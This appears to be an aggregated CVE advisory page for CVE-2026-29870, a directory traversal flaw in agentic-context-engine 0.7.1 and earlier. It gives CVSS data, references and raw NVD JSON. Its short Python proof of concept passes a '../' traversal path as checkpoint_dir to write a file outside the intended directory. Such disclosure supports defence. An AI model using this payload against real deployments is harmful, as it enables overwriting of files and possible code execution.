CVE-2026-29870

Description

A directory traversal vulnerability in the agentic-context-engine project versions up to 0.7.1 allows arbitrary file writes via the checkpoint_dir parameter in OfflineACE.run. The save_to_file method in ace/skillbook.py fails to normalize or validate filesystem paths, allowing traversal sequences to escape the intended checkpoint directory. This vulnerability allows attackers to overwrite arbitrary files accessible to the application process, potentially leading to application corruption, privilege escalation, or code execution depending on the deployment context.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

agentic-context-engine <= 0.7.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
from ace import OfflineACE

# Vulnerable Parameter: checkpoint_dir
# Using path traversal sequences (../) to escape the intended directory
malicious_payload = "../../../../tmp/malicious_file.txt"

# Initialize the engine
engine = OfflineACE()

# Trigger the vulnerability in OfflineACE.run
# The save_to_file method in ace/skillbook.py fails to normalize the path
# This will write to /tmp/malicious_file.txt instead of the checkpoint dir
try:
    engine.run(
        data="exploit_content",
        checkpoint_dir=malicious_payload
    )
    print("File written successfully via directory traversal.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29870
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29870
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29870/
[4] VulDB https://vuldb.com/cve/CVE-2026-29870
[5] https://github.com/lilmingwa13/security-research/blob/main/CVE-2026-29870.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29870", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:12.733", "lastModified": "2026-04-01T14:24:02.583", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A directory traversal vulnerability in the agentic-context-engine project versions up to 0.7.1 allows arbitrary file writes via the checkpoint_dir parameter in OfflineACE.run. The save_to_file method in ace/skillbook.py fails to normalize or validate filesystem paths, allowing traversal sequences to escape the intended checkpoint directory. This vulnerability allows attackers to overwrite arbitrary files accessible to the application process, potentially leading to application corruption, privilege escalation, or code execution depending on the deployment context."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/lilmingwa13/security-research/blob/main/CVE-2026-29870.md", "source": "[email protected]"}]}}